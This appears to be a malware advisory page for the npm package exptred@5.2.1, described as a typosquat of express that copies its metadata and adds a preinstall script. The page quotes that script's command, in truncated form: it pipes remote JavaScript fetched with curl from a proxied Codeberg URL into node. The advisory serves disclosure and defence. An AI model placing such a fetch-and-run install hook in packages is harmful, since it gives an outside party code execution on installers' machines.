exptred@5.2.1
Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC
OSV ID
MAL-2026-17246
Ecosystem
npm
Summary
npm package exptred@5.2.1 is a typosquat of express: package.json copies express's description ('Fast, unopinionated, minimalist web framework'), author (TJ Holowaychuk), repository (expressjs/express), and homepage (expressjs.com), and index.js re-exports lib/express. The tarball adds a preinstall lifecycle script that pipes remote JavaScript into node: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/... | node. On npm install, whatever bytes the web.archive.org-proxied Codeberg branch currently returns are executed on the installer's host. The source is a personal Codeberg user's raw branch content — mutable, non-publisher, unpinned, and integrity-unchecked — so the operator of that branch controls arbitrary code execution on every machine that installs the package.
Source: amazon-inspector (d91842ab3e5c93f5689a985b63f8de5455910d88d6815ee35f2d35d27f8a4cf7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.